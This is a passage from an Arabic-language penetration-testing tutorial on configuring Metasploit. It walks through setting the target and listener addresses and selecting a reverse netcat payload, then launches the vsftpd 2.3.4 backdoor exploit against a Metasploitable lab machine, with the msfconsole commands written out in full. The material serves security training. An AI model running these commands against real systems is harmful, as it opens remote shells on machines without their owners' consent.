التكوين العملي لـ Metasploit
استكمالاً لسير العمل، بعد اختيار الاستغلال، يجب عليك تكوين المعلمات (parameters)، خاصة الهدف والمضيف المستمع.
ضبط الخيارات المطلوبة
يتطلب كل استغلال ضبط متغيرين حاسمين على الأقل:
- RHOSTS (Remote Hosts): عنوان IP للجهاز المستهدف.
- LHOST (Local Host): عنوان IP للمهاجم (جهاز Kali Linux) حيث سيتصل الـ reverse shell العكسي.
متابعة المثال (مهاجمة Metasploitable ، IP 192.168.1.50):
msfconsole msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
ضبط IP الهدف
msf6 exploit(...) > set RHOSTS 192.168.1.50
ضبط IP الخاص بنا (IP المهاجم)
msf6 exploit(...) > set LHOST 192.168.1.10
اختيار الـ payload (غالباً ما يتم اختياره تلقائياً)
msf6 exploit(...) > show payloads msf6 exploit(...) > set PAYLOAD cmd/unix/reverse_netcat
إطلاق الاستغلال
msf6 exploit(...) > exploit